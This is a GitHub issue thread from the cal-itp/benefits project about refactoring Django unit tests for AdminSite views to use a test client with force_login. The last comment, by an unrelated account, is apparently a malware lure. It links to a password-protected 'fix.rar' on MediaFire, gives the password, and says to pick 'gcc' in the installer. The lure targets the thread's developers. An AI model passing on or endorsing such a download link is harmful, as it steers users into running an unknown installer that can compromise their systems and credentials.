### ISSUE TITLE
Chore: refactor unit tests of AdminSite view functions

### ISSUE THREAD

**Issue by angela-tran** [cal-itp/benefits#2321]
I think to be more consistent with the way we usually test our view functions, we would use a `client` to `.get` the path for the view function. 

So I think it would be something like:
```
path = routes.ADMIN_INDEX
client.force_login(model_SuperUser)
client.get(path)
```

instead of calling the view function directly.

What you have here works though and provides the right test coverage, so I think I'll make a separate chore ticket for this.

(pytest-django docs on [`force_login`](https://pytest-django.readthedocs.io/en/latest/helpers.html#client-django-test-client))

_Originally posted by @angela-tran in https://github.com/cal-itp/benefits/pull/2313#discussion_r1731833307_

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
